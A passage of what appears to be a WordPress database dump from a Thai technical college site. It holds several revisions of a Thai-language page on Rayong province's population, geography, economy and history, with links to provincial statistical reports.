lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 638,017 <span lang=\"TH\">คนในปี</span> 2560 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h2 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h2>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/vision%20in%20rayong%202554(news).pdf\">บรรยายสรุปจังหวัดระยอง</a></h4>\r\n</div>\r\n<h3><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h3>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง </strong><strong>ปีงบประมาณ 2555 </strong><strong> <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88_%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1%202555.pdf\">เดือนตุลาคม</a></strong>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B8%9B%E0%B8%B5%202554.pdf\">ปีงบประมาณ 2554 </a> </strong>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></h4>\r\n<h4><span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span></h4>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></h4>\r\n<h4><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></h4>\r\n</div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 20:45:04', '2018-01-29 13:45:04', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(846, 3, '2018-01-29 20:49:54', '2018-01-29 13:49:54', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>2558 <span lang=\"TH\">มีทั้งสิ้น</span> 688,999<span lang=\"TH\"> คน เป็นชาย 339</span>,333<span lang=\"TH\"> คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 349,666 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 271,460 <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,816<span lang=\"TH\"> คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 527.60 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>292.10 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 65.8 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 698,017 <span lang=\"TH\">คนในปี</span> 2561 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h4><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ </span><span style=\"color: #0000ff;\">เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h4>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n<h4><b><a href=\"http://rayong.cdd.go.th/project.html/JPT/JPT.htm\">ข้อมูลความจำเป็นพื้นฐานและข้อมูลพื้นฐาน</a> จังหวัดระยอง 2559</b></h4>\r\n<h2 class=\"contentheading\"><a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%92%E0%B8%99%E0%B8%B2%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%202558-2561.pdf\">แผนพัฒนาจังหวัดระยอง 2558 - 2561</a></h2>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/vision%20in%20rayong%202554(news).pdf\">บรรยายสรุปจังหวัดระยอง</a></h4>\r\n</div>\r\n<h3><a href=\"http://klang.cgd.go.th/ryg/gpprayong.html\">GPP จังหวัดระยอง</a></h3>\r\n<a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=608&Itemid=199\"><strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง ปีงบประมาณ 2548-2558</strong></a>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง </strong><strong>ปีงบประมาณ 2555 </strong><strong> <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88_%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B9%80%E0%B8%94%E0%B8%B7%E0%B8%AD%E0%B8%99%E0%B8%95%E0%B8%B8%E0%B8%A5%E0%B8%B2%E0%B8%84%E0%B8%A1%202555.pdf\">เดือนตุลาคม</a></strong>\r\n\r\n<strong>รายงานภาวะเศรษฐกิจการคลังจังหวัดระยอง <a href=\"http://wwww.technicrayong.ac.th/sites/default/files/file/Datacenter/5%20%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A0%E0%B8%B2%E0%B8%A7%E0%B8%B0%E0%B9%80%E0%B8%A8%E0%B8%A3%E0%B8%A9%E0%B8%90%E0%B8%81%E0%B8%B4%E0%B8%88%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%84%E0%B8%A5%E0%B8%B1%E0%B8%87%E0%B8%88%E0%B8%B1%E0%B8%87%E0%B8%AB%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B8%A3%E0%B8%B0%E0%B8%A2%E0%B8%AD%E0%B8%87%20%E0%B8%9B%E0%B8%B5%202554.pdf\">ปีงบประมาณ 2554 </a> </strong>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1180:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2559</a></b></h4>\r\n<h4><span style=\"color: #0000ff; font-size: medium;\"><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1159:-2558&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2558</a></b></span></h4>\r\n<h4><b><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1134:-2557&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2557</a></b></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1133:-2556&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2556</a></strong></h4>\r\n<h4><strong><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1103:-2555&catid=118:2010-09-07-05-32-11&Itemid=217\">รายงานสถิติจังหวัดระยอง 2555</a></strong></h4>\r\n<h4><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1047:-2554&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2554</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=1016:-2553&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2553</strong></a></h4>\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=910:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2552</strong></a></h4>\r\n<div class=\"article-rel-wrapper\">\r\n<h4 class=\"contentheading\"><a href=\"http://123.242.173.8/v2/index.php?option=com_content&view=article&id=764:2010-04-04-09-46-49&catid=118:2010-09-07-05-32-11&Itemid=217\"><strong>รายงานสถิติจังหวัดระยอง 2551</strong></a></h4>\r\n</div>\r\n</div>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 20:49:54', '2018-01-29 13:49:54', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(847, 3, '2018-01-29 20:51:54', '2018-01-29 13:51:54', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span 